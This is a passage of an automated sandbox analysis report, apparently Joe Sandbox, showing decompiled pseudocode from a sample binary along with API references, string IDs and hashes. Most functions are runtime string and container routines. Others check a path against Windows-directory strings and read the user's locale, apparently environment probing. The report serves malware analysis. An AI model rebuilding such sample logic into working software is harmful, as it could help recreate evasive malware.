                                                                    								E00417C5A(_t329,  *(_t380 - 0x54) -  *((intOrPtr*)(_t380 - 0x4c)), _t380 - 0x2c, _t380,  *(_t380 - 0x58), 0x30);
                                                                    							} else {
                                                                    								E0040C3CF( *(_t380 - 0x58), _t329, _t380 - 0x2c, _t380, 0x30);
                                                                    							}
                                                                    							_t319 =  *(_t380 - 0x64);
                                                                    							_push(0x30);
                                                                    							_t376 = _t380 - 0x2c;
                                                                    							if( *(_t380 - 0x64) != 0) {
                                                                    								_push( *(_t380 - 0x74));
                                                                    								E00417C5A(_t329, _t319 -  *((intOrPtr*)(_t380 - 0x4c)) + 1, _t376, _t380);
                                                                    								_t376 = _t380 - 0x2c;
                                                                    								E00417C5A(_t329, _t319 -  *((intOrPtr*)(_t380 - 0x4c)), _t380 - 0x2c, _t380,  *(_t380 - 0x60), 0x30);
                                                                    								_t67 = _t380 - 0x74;
                                                                    								 *_t67 =  *(_t380 - 0x74) & 0x00000000;
                                                                    								__eflags =  *_t67;
                                                                    							} else {
                                                                    								E0040C3CF( *(_t380 - 0x60), _t329, _t376, _t380);
                                                                    							}
                                                                    							 *(_t380 - 0x60) =  *(_t380 - 0x60) & 0x00000000;
                                                                    							_t321 =  *((intOrPtr*)(_t380 - 0x48));
                                                                    							if( *((intOrPtr*)(_t380 - 0x34)) < 0x10) {
                                                                    								_t321 = _t380 - 0x48;
                                                                    							}
                                                                    							_t304 =  *((intOrPtr*)(_t380 - 0x2c));
                                                                    							if( *((intOrPtr*)(_t380 - 0x18)) < 0x10) {
                                                                    								_t304 = _t380 - 0x2c;
                                                                    							}
                                                                    							_t372 = E0041FDA0(_t380 - 0x5c, _t304, _t380 - 0x5c);
                                                                    							while(1) {
                                                                    								_t306 =  *_t321;
                                                                    								if(_t306 == 0x7f) {
                                                                    									break;
                                                                    								}
                                                                    								__eflags = _t306;
                                                                    								if(_t306 <= 0) {
                                                                    									break;
                                                                    								}
                                                                    								_t356 = _t372 -  *(_t380 - 0x78);
                                                                    								_t309 = _t306;
                                                                    								__eflags = _t309 - _t372 -  *(_t380 - 0x78);
                                                                    								if(_t309 >= _t372 -  *(_t380 - 0x78)) {
                                                                    									break;
                                                                    								}
                                                                    								_t372 = _t372 - _t309;
                                                                    								_t376 = _t380 - 0x2c;
                                                                    								E00417C5A(_t356, _t372, _t380 - 0x2c, _t380, 1, 0);
                                                                    								_t311 = _t321 + 1;
                                                                    								__eflags =  *_t311;
                                                                    								if( *_t311 > 0) {
                                                                    									_t321 = _t311;
                                                                    								}
                                                                    							}
                                                                    							_t307 =  *((intOrPtr*)(_t380 - 0x2c));
                                                                    							if( *((intOrPtr*)(_t380 - 0x18)) < 0x10) {
                                                                    								_t307 = _t380 - 0x2c;
                                                                    							}
                                                                    							 *(_t380 - 0x58) =  *(_t380 - 0x58) & 0x00000000;
                                                                    							_t361 =  *((intOrPtr*)(_t380 - 0x7c));
                                                                    							 *((intOrPtr*)(_t380 - 0x4c)) = _t307;
                                                                    							 *((intOrPtr*)(_t380 - 0x50)) =  *((intOrPtr*)(_t380 - 0x1c));
                                                                    							_t316 = 0;
                                                                    						}
                                                                    						goto L32;
                                                                    					}
                                                                    				}
                                                                    				 *(_t380 - 0x78) = 0;
                                                                    				_t393 = _t238 - 0x2d;
                                                                    				if(_t238 != 0x2d) {
                                                                    					goto L3;
                                                                    				}
                                                                    				goto L2;
                                                                     			}

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00417D87
                                                                      • Part of subcall function 0040E367: std::locale::facet::_Incref.LIBCPMT ref: 0040E36E
                                                                      • Part of subcall function 00418714: __EH_prolog3.LIBCMT ref: 0041871B
                                                                      • Part of subcall function 00418714: std::_Lockit::_Lockit.LIBCPMT ref: 00418725
                                                                    • _localeconv.LIBCMT ref: 00417E29
                                                                    • _strcspn.LIBCMT ref: 00417F34
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prolog3H_prolog3_IncrefLockitLockit::__localeconv_strcspnstd::_std::locale::facet::_
                                                                    • String ID: e
                                                                    • API String ID: 441263477-4024072794
                                                                    • Opcode ID: c936e7cf8a01c4a202f77bad19f55d2c6cb156e13ac2061a4452768913dc2194
                                                                    • Instruction ID: 29acf64dfad355f7b7e1bab66952c210668dbd1d81d79163391d8d13252e589e
                                                                    • Opcode Fuzzy Hash: c936e7cf8a01c4a202f77bad19f55d2c6cb156e13ac2061a4452768913dc2194
                                                                    • Instruction Fuzzy Hash: F602F371D00248DFCF15DFA9C881ADDBBB1BF08308F15816AE909AB252D735A986CF58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 97%
                                                                    			E004091E5(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                    				void* _t33;
                                                                    				void* _t83;
                                                                    				signed int _t90;
                                                                    				signed int _t91;
                                                                    				void* _t92;
                                                                    
                                                                    				_push(0x20);
                                                                    				E0042083E(E00433F7A, __ebx, __edi, __esi);
                                                                    				_t90 = _t92 - 0x2c;
                                                                    				 *((intOrPtr*)(_t92 - 4)) = 0;
                                                                    				_t83 = 0;
                                                                    				E00404778(_t90, _t92 + 8);
                                                                    				_t33 = E0040C00F(_t90, "C:\\Windows\\", 0);
                                                                    				_t91 = _t90 | 0xffffffff;
                                                                    				if(_t33 != _t91) {
                                                                    					_t83 = 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c, "C:\\\\Windows\\", 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c, "C:\\\\\\Windows\\", 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c,  *0x4460d4, 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c,  *0x445ffc, 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c,  *0x446004, 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c,  *0x445d28, 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c,  *0x445dcc, 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c,  *0x446014, 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c,  *0x445ba0, 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c,  *0x445f6c, 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c,  *0x445cf0, 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c,  *0x445ea8, 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c,  *0x445e38, 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c,  *0x446180, 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c,  *0x445f4c, 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c,  *0x445fc8, 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c,  *0x445d74, 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c,  *0x445e34, 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c,  *0x445b9c, 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c,  *0x445aa0, 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c,  *0x445bfc, 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				if(E0040C00F(_t92 - 0x2c,  *0x446010, 0) != _t91) {
                                                                    					_t83 = _t83 + 1;
                                                                    				}
                                                                    				E00404354(_t92 - 0x2c, 1, 0);
                                                                    				E00404354(_t92 + 8, 1, 0);
                                                                    				return E00420888(_t83, 0, _t91);
                                                                    			}









                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prolog3_
                                                                    • String ID: C:\Windows\$C:\\Windows\$C:\\\Windows\
                                                                    • API String ID: 2427045233-1289299778
                                                                    • Opcode ID: a42c2bce63919a1d40cd009a0b5b961e4d63c1d9277672bf13a03d12b4d4731c
                                                                    • Instruction ID: b813a3aab00f77bb49292ce9513a68c51c2533bd51e460e3b6aaa5db3685e307
                                                                    • Opcode Fuzzy Hash: a42c2bce63919a1d40cd009a0b5b961e4d63c1d9277672bf13a03d12b4d4731c
                                                                    • Instruction Fuzzy Hash: 45513F7590014AEECE31ABE28CC5C9F763CE689B0CB21993BF115F2193C638CD45DA69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 84%
                                                                    			E00413C85(void* __ebx, signed int* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                                                    				intOrPtr _t48;
                                                                    				signed int _t53;
                                                                    				void* _t58;
                                                                    				intOrPtr _t59;
                                                                    				intOrPtr _t62;
                                                                    				void* _t63;
                                                                    				void* _t65;
                                                                    				intOrPtr* _t67;
                                                                    				signed int* _t68;
                                                                    				void* _t75;
                                                                    				signed int _t77;
                                                                    				intOrPtr _t85;
                                                                    				signed int* _t89;
                                                                    				signed int _t93;
                                                                    				void* _t96;
                                                                    				void* _t97;
                                                                    
                                                                    				_push(0x2c);
                                                                    				E0042083E(E00433C31, __ebx, __edi, __esi);
                                                                    				_t72 =  *(_t96 + 8);
                                                                    				_t91 = __esi | 0xffffffff;
                                                                    				_t89 = __ecx;
                                                                    				if(_t72 != _t91) {
                                                                    					_t77 =  *( *(__ecx + 0x24));
                                                                    					__eflags = _t77;
                                                                    					if(_t77 == 0) {
                                                                    						L6:
                                                                    						__eflags = _t89[0x15];
                                                                    						if(_t89[0x15] != 0) {
                                                                    							E004145CB(_t89);
                                                                    							__eflags = _t89[0x11];
                                                                    							if(__eflags != 0) {
                                                                    								 *(_t96 - 0x2d) = _t72;
                                                                    								E004142E1(_t72, _t89, _t96 - 0x2c, __eflags);
                                                                    								_t11 = _t96 - 4;
                                                                    								 *_t11 =  *(_t96 - 4) & 0x00000000;
                                                                    								__eflags =  *_t11;
                                                                    								while(1) {
                                                                    									__eflags =  *((intOrPtr*)(_t96 - 0x18)) - 0x10;
                                                                    									_t48 =  *((intOrPtr*)(_t96 - 0x2c));
                                                                    									if( *((intOrPtr*)(_t96 - 0x18)) >= 0x10) {
                                                                    										_t85 =  *((intOrPtr*)(_t96 - 0x2c));
                                                                    									} else {
                                                                    										_t48 = _t96 - 0x2c;
                                                                    										_t85 = _t48;
                                                                    									}
                                                                    									_t78 = _t89[0x11];
                                                                    									_t93 =  *(_t89[0x11]);
                                                                    									_t72 =  *((intOrPtr*)(_t96 - 0x1c)) + _t48;
                                                                    									_t53 =  *((intOrPtr*)(_t93 + 0x14))( &(_t89[0x13]), _t96 - 0x2d, _t96 - 0x2c, _t96 - 0x38, _t85,  *((intOrPtr*)(_t96 - 0x1c)) + _t48, _t96 - 0x34);
                                                                    									__eflags = _t53;
                                                                    									if(_t53 < 0) {
                                                                    										break;
                                                                    									}
                                                                    									__eflags = _t53 - 1;
                                                                    									if(_t53 > 1) {
                                                                    										__eflags = _t53 - 3;
                                                                    										if(__eflags != 0) {
                                                                    											break;
                                                                    										}
                                                                    										_push(_t89[0x15]);
                                                                    										_push( *(_t96 - 0x2d));
                                                                    										_t58 = E0041ED88(_t72, _t89, _t93, __eflags);
                                                                    										_t91 = _t93 | 0xffffffff;
                                                                    										__eflags = _t58 - _t91;
                                                                    										if(_t58 == _t91) {
                                                                    											L31:
                                                                    											E00404354(_t96 - 0x2c, 1, 0);
                                                                    											goto L7;
                                                                    										}
                                                                    										L29:
                                                                    										_t91 =  *(_t96 + 8);
                                                                    										goto L31;
                                                                    									}
                                                                    									__eflags =  *((intOrPtr*)(_t96 - 0x18)) - 0x10;
                                                                    									_t59 =  *((intOrPtr*)(_t96 - 0x2c));
                                                                    									if( *((intOrPtr*)(_t96 - 0x18)) < 0x10) {
                                                                    										_t59 = _t96 - 0x2c;
                                                                    									}
                                                                    									_t93 =  *((intOrPtr*)(_t96 - 0x34)) - _t59;
                                                                    									__eflags = _t93;
                                                                    									if(_t93 == 0) {
                                                                    										L22:
                                                                    										_t89[0x12] = 1;
                                                                    										__eflags =  *((intOrPtr*)(_t96 - 0x38)) - _t96 - 0x2d;
                                                                    										if( *((intOrPtr*)(_t96 - 0x38)) != _t96 - 0x2d) {
                                                                    											goto L29;
                                                                    										}
                                                                    										__eflags = _t93;
                                                                    										if(_t93 != 0) {
                                                                    											continue;
                                                                    										}
                                                                    										__eflags =  *((intOrPtr*)(_t96 - 0x1c)) - 0x20;
                                                                    										if( *((intOrPtr*)(_t96 - 0x1c)) >= 0x20) {
                                                                    											break;
                                                                    										}
                                                                    										_push(_t93);
                                                                    										_t75 = 8;
                                                                    										E0040C3CF(_t75, _t78, _t96 - 0x2c, _t96);
                                                                    										continue;
                                                                    									} else {
                                                                    										__eflags =  *((intOrPtr*)(_t96 - 0x18)) - 0x10;
                                                                    										_t62 =  *((intOrPtr*)(_t96 - 0x2c));
                                                                    										if(__eflags < 0) {
                                                                    											_t62 = _t96 - 0x2c;
                                                                    										}
                                                                    										_push(_t89[0x15]);
                                                                    										_push(_t93);
                                                                    										_push(1);
                                                                    										_push(_t62);
                                                                    										_t63 = E0041FA4B(_t72, _t85, _t89, _t93, __eflags);
                                                                    										_t97 = _t97 + 0x10;
                                                                    										__eflags = _t93 - _t63;
                                                                    										if(_t93 != _t63) {
                                                                    											break;
                                                                    										}
                                                                    										goto L22;
                                                                    									}
                                                                    								}
                                                                    								_t91 = _t93 | 0xffffffff;
                                                                    								__eflags = _t93 | 0xffffffff;
                                                                    								goto L31;
                                                                    							}
                                                                    							_push(_t89[0x15]);
                                                                    							_push(_t72);
                                                                    							_t65 = E0041ED88(_t72, _t89, _t91, __eflags);
                                                                    							__eflags = _t65 - _t91;
                                                                    							if(_t65 != _t91) {
                                                                    								L2:
                                                                    								return E00420888(_t72, _t89, _t91);
                                                                    							}
                                                                    						}
                                                                    						L7:
                                                                    						goto L2;
                                                                    					}
                                                                    					_t67 =  *((intOrPtr*)(__ecx + 0x34));
                                                                    					__eflags = _t77 -  *_t67 + _t77;
                                                                    					if(_t77 >=  *_t67 + _t77) {
                                                                    						goto L6;
                                                                    					}
                                                                    					 *_t67 =  *_t67 - 1;
                                                                    					_t89 =  *(__ecx + 0x24);
                                                                    					_t68 =  *_t89;
                                                                    					 *_t89 =  &(_t68[0]);
                                                                    					 *_t68 = _t72;
                                                                    					goto L2;
                                                                    				}
                                                                    				goto L2;
                                                                    			}




















                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _fputc$H_prolog3_
                                                                    • String ID:
                                                                    • API String ID: 668804286-3916222277
                                                                    • Opcode ID: c0ed616817cea286eb02bf539f528bf657eba571351e207018cb105a92e1eec3
                                                                    • Instruction ID: e11441ca7ad80cdd48506b504b0b9aa4bc3c957bba98ad18be85b308e557b614
                                                                    • Opcode Fuzzy Hash: c0ed616817cea286eb02bf539f528bf657eba571351e207018cb105a92e1eec3
                                                                    • Instruction Fuzzy Hash: E7415232A005199FDF20DFA8D480AEEB7B4BF18716F10451BE911B7280D738EA85CBD9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 68%
                                                                    			E00414796(void* __ebx, void* __edi, signed int* __esi) {
                                                                    				unsigned int _t36;
                                                                    				unsigned int _t37;
                                                                    				signed int _t41;
                                                                    				signed int _t44;
                                                                    				void* _t55;
                                                                    				signed int _t56;
                                                                    				signed int _t59;
                                                                    				signed int _t60;
                                                                    				unsigned int _t61;
                                                                    				signed int _t62;
                                                                    				signed int _t63;
                                                                    				signed int _t66;
                                                                    				signed int* _t72;
                                                                    				signed int _t76;
                                                                    				signed int _t77;
                                                                    				signed int _t78;
                                                                    				void* _t80;
                                                                    				signed int _t81;
                                                                    				signed int _t82;
                                                                    				signed int* _t85;
                                                                    				signed int* _t86;
                                                                    				void* _t87;
                                                                    
                                                                    				_t85 = __esi;
                                                                    				_t55 = __ebx;
                                                                    				_t59 =  *__esi;
                                                                    				_push(__edi);
                                                                    				asm("cdq");
                                                                    				_t76 = 0x1c;
                                                                    				_t77 = (__esi[1] - _t59) / _t76;
                                                                    				if(_t77 > 0x9249248) {
                                                                    					E0041CFA0("vector<T> too long");
                                                                    				}
                                                                    				asm("cdq");
                                                                    				_t60 = 0x1c;
                                                                    				_t36 = (_t85[2] - _t59) / _t60;
                                                                    				_t78 = _t77 + 1;
                                                                    				if(_t78 <= _t36) {
                                                                    					return _t36;
                                                                    				} else {
                                                                    					_t61 = _t36;
                                                                    					_t37 = _t36 >> 1;
                                                                    					if(0x9249249 - _t37 >= _t61) {
                                                                    						_t62 = _t61 + _t37;
                                                                    						__eflags = _t62;
                                                                    					} else {
                                                                    						_t62 = 0;
                                                                    					}
                                                                    					if(_t62 < _t78) {
                                                                    						_t62 = _t78;
                                                                    					}
                                                                    					_t72 = _t85;
                                                                    					_pop(_t80);
                                                                    					_push(8);
                                                                    					E00420808(E00434170, _t55, _t80, _t85);
                                                                    					_t56 = _t62;
                                                                    					_t86 = _t72;
                                                                    					if(_t56 > 0x9249249) {
                                                                    						E0041CFA0("vector<T> too long");
                                                                    					}
                                                                    					_t41 = _t86[2] -  *_t86;
                                                                    					asm("cdq");
                                                                    					_t63 = 0x1c;
                                                                    					_t42 = _t41 / _t63;
                                                                    					_t95 = _t41 / _t63 - _t56;
                                                                    					if(_t41 / _t63 < _t56) {
                                                                    						_t44 = E00414893(_t56, _t80, _t86);
                                                                    						 *(_t87 - 4) =  *(_t87 - 4) & 0x00000000;
                                                                    						 *(_t87 - 0x14) = _t44;
                                                                    						_push( *(_t87 - 0x14));
                                                                    						_push( *(_t87 - 0x14));
                                                                    						_push(_t86[1]);
                                                                    						E00414C0F(_t56,  *_t86, _t95);
                                                                    						_t66 =  *_t86;
                                                                    						asm("cdq");
                                                                    						_t81 = 0x1c;
                                                                    						_t82 = (_t86[1] - _t66) / _t81;
                                                                    						if(_t66 != 0) {
                                                                    							E0040D51F(_t66, _t86[1]);
                                                                    							_push( *_t86);
                                                                    							E0041E1F1();
                                                                    						}
                                                                    						_t42 =  *(_t87 - 0x14);
                                                                    						_t86[2] = _t56 * 0x1c + _t42;
                                                                    						_t86[1] = _t82 * 0x1c + _t42;
                                                                    						 *_t86 = _t42;
                                                                    					}
                                                                    					return E00420874(_t42);
                                                                    				}
                                                                    			}


























                                                                    APIs
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004147B3
                                                                      • Part of subcall function 0041CFA0: std::exception::exception.LIBCMT ref: 0041CFB5
                                                                      • Part of subcall function 0041CFA0: __CxxThrowException@8.LIBCMT ref: 0041CFCA
                                                                      • Part of subcall function 0041CFA0: std::exception::exception.LIBCMT ref: 0041CFDB
                                                                    • __EH_prolog3_catch.LIBCMT ref: 004147F4
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0041480A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
                                                                    • String ID: vector<T> too long
                                                                    • API String ID: 2448322171-3788999226
                                                                    • Opcode ID: 6b7a71ee07559251e7a88e94207761f64fcc3fa7f0496beaba7eae0e72a277a5
                                                                    • Instruction ID: af6e26ebaf4091a82c7bbf81281d331d377815d3cd0bf7965de59ac72cfe8f5b
                                                                    • Opcode Fuzzy Hash: 6b7a71ee07559251e7a88e94207761f64fcc3fa7f0496beaba7eae0e72a277a5
                                                                    • Instruction Fuzzy Hash: 3A21273AB402018BC718EE7ED985A6EF6D29FD5704B21483FF152D7280DA78DCC14758
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 57%
                                                                    			E00415522(intOrPtr __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				void* __ebp;
                                                                    				signed int _t27;
                                                                    				void* _t40;
                                                                    				intOrPtr _t49;
                                                                    				intOrPtr _t50;
                                                                    				intOrPtr _t58;
                                                                    				intOrPtr _t60;
                                                                    				intOrPtr _t64;
                                                                    				intOrPtr _t71;
                                                                    				signed int _t72;
                                                                    				void* _t74;
                                                                    
                                                                    				_t58 = __edx;
                                                                    				_t49 = __ebx;
                                                                    				_t72 = _t74 - 0xfc;
                                                                    				_t27 =  *0x443674; // 0x393162b1
                                                                    				 *(_t72 + 0x100) = _t27 ^ _t72;
                                                                    				_push(4);
                                                                    				E004207D5(E00433B88, __ebx, __edi, __esi);
                                                                    				_t60 = 0xf;
                                                                    				 *((intOrPtr*)(_t72 - 0x10)) = 0;
                                                                    				 *((intOrPtr*)(_t72 + 0x4c)) = _t60;
                                                                    				 *((intOrPtr*)(_t72 + 0x48)) = 0;
                                                                    				 *((char*)(_t72 + 0x38)) = 0;
                                                                    				 *((intOrPtr*)(_t72 - 4)) = 0;
                                                                    				 *((short*)(_t72 + 0x54)) = 0;
                                                                    				E00426300(_t72 + 0x56, 0, 0xa8);
                                                                    				_push(0x55);
                                                                    				_push(_t72 + 0x54);
                                                                    				if( *0x44631c() != 0) {
                                                                    					E00415ADE(_t72 + 0x1c, _t72 + 0x54);
                                                                    					 *((char*)(_t72 - 4)) = 1;
                                                                    					_t40 = E0041607C(_t72 + 0x1c, _t58, _t72);
                                                                    					 *((char*)(_t72 - 4)) = 2;
                                                                    					E004042ED(_t72 + 0x38, _t40);
                                                                    					E00404354(_t72, 1, 0);
                                                                    					 *((char*)(_t72 - 4)) = 0;
                                                                    					E0040C148(0, _t72 + 0x1c, 1);
                                                                    					 *(__ebx + 0x10) =  *(__ebx + 0x10) & 0;
                                                                    					 *((intOrPtr*)(__ebx + 0x14)) = 0xf;
                                                                    					 *((char*)(__ebx)) = 0;
                                                                    					E004042ED(__ebx, _t72 + 0x38);
                                                                    					_push(0);
                                                                    				} else {
                                                                    					 *((intOrPtr*)(__ebx + 0x14)) = _t60;
                                                                    					 *(__ebx + 0x10) = 0;
                                                                    					 *((char*)(__ebx)) = 0;
                                                                    					E00404331(__ebx, "Unknown");
                                                                    					_push(0);
                                                                    				}
                                                                    				E00404354(_t72 + 0x38);
                                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));
                                                                    				_t64 = 1;
                                                                    				_pop(_t71);
                                                                    				_pop(_t50);
                                                                    				return E0041DA9B(_t49, _t50,  *(_t72 + 0x100) ^ _t72, _t58, _t64, _t71);
                                                                    			}















                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00415541
                                                                    • _memset.LIBCMT ref: 0041556B
                                                                    • GetUserDefaultLocaleName.KERNEL32(00000000,00000055,?,?,00000004), ref: 00415579
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DefaultH_prolog3LocaleNameUser_memset
                                                                    • String ID: Unknown
                                                                    • API String ID: 1926270201-1654365787
                                                                    • Opcode ID: 0d879948cb59eb1ea15295f325b7edfddf6b94f6d397e911dca6ecdd40f54d49
                                                                    • Instruction ID: 417e88528b010e53538cb3bb12a601a2e6796a3512ff39e0d3b0a7e19062a527
                                                                    • Opcode Fuzzy Hash: 0d879948cb59eb1ea15295f325b7edfddf6b94f6d397e911dca6ecdd40f54d49
                                                                    • Instruction Fuzzy Hash: 0231F671600258ABDB10EFA9CC417CD7BA4AF54704F40406FFE04EB2C2DBB89648C795
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00404927(signed int __eax, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4) {
                                                                    				void* __ebx;
                                                                    				void* __esi;
                                                                    				intOrPtr _t14;
                                                                    				intOrPtr _t17;
                                                                    				intOrPtr* _t18;
                                                                    				intOrPtr* _t21;
                                                                    				intOrPtr* _t23;
                                                                    				intOrPtr* _t24;
                                                                    				intOrPtr _t28;
                                                                    				signed int _t31;
                                                                    				intOrPtr* _t35;
                                                                    				void* _t36;
                                                                    				intOrPtr* _t37;
                                                                    				void* _t38;
                                                                    
                                                                    				_t38 = __ebp;
                                                                    				_t36 = __edi;
                                                                    				_t27 = _a4;
                                                                    				_t37 = __eax;
                                                                    				_t31 = __eax;
                                                                    				if(E00404505(__eax, _a4) == 0) {
                                                                    					_t14 =  *((intOrPtr*)(_t37 + 0x10));
                                                                    					if((_t31 | 0xffffffff) - _t14 <= __edi) {
                                                                    						_t14 = E0041CFA0("string too long");
                                                                    					}
                                                                    					if(_t36 != 0) {
                                                                    						_t28 = _t14 + _t36;
                                                                    						if(E004044A3(_t28, _t37, _t36, _t38, _t28, 0) != 0) {
                                                                    							_t17 =  *((intOrPtr*)(_t37 + 0x14));
                                                                    							if(_t17 < 0x10) {
                                                                    								_t35 = _t37;
                                                                    							} else {
                                                                    								_t35 =  *_t37;
                                                                    							}
                                                                    							if(_t17 < 0x10) {
                                                                    								_t18 = _t37;
                                                                    							} else {
                                                                    								_t18 =  *_t37;
                                                                    							}
                                                                    							E0041DCF0(_t18 + _t36, _t35,  *((intOrPtr*)(_t37 + 0x10)));
                                                                    							if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
                                                                    								_t21 = _t37;
                                                                    							} else {
                                                                    								_t21 =  *_t37;
                                                                    							}
                                                                    							E00420090(_t21, _a4, _t36);
                                                                    							 *((intOrPtr*)(_t37 + 0x10)) = _t28;
                                                                    							if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
                                                                    								_t23 = _t37;
                                                                    							} else {
                                                                    								_t23 =  *_t37;
                                                                    							}
                                                                    							 *((char*)(_t23 + _t28)) = 0;
                                                                    						}
                                                                    					}
                                                                    					return _t37;
                                                                    				}
                                                                    				if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
                                                                    					_t24 = _t37;
                                                                    				} else {
                                                                    					_t24 =  *_t37;
                                                                    				}
                                                                    				return E0040482E(_t36, _t37, _t31, _t36, _t37, _t27 - _t24);
                                                                    			}


















                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _memmove$Xinvalid_argumentstd::_
                                                                    • String ID: string too long
                                                                    • API String ID: 1771113911-2556327735
                                                                    • Opcode ID: 937ef8314f4c0685631689a7c7ae684891f2464a59e84504085fdcdfdf634197
                                                                    • Instruction ID: 8616b515de50a051e8ed2ef309b9bb156470a8c1fb3f5f5963f810359020d125
                                                                    • Opcode Fuzzy Hash: 937ef8314f4c0685631689a7c7ae684891f2464a59e84504085fdcdfdf634197
                                                                    • Instruction Fuzzy Hash: 4511A1F030025097DA249E7D8985A2BB3E5EBC1710B10093FE6D2A72C2D7389C51879D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 79%
                                                                    			E0041615D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				void* __ecx;
                                                                    				void* _t43;
                                                                    				signed int _t51;
                                                                    				void* _t52;
                                                                    				intOrPtr* _t53;
                                                                    
                                                                    				_t42 = __ebx;
                                                                    				_push(0x9c);
                                                                    				E004207D5(E00434503, __ebx, __edi, __esi);
